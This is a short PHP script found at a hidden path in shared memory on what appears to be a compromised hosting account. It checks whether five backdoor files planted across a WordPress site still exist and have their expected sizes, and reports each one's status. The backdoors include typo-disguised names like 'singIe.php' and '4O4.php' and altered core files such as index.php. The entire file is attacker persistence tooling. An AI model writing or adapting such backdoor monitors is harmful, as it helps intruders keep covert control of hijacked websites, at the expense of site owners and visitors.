File: //run/shm/.ptr
<?php $r = '/home/dh_af6sw9/mikesteigerwald.com'; $x = ["/wp-content/themes/bottom_1757867900/4O4.php"=>"bd@@469607@@967",
"/wp-content/themes/twentytwentytwo/inc/patterns/header-image-background.php"=>"bd@@568481@@2852",
"/wp-content/themes/error_404_1747918291/singIe.php"=>"bd@@1404085@@731",
"/index.php"=>"bd@@646880@@405",
"/wp-includes/pomo/streams.php"=>"bd@@606462@@8526"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');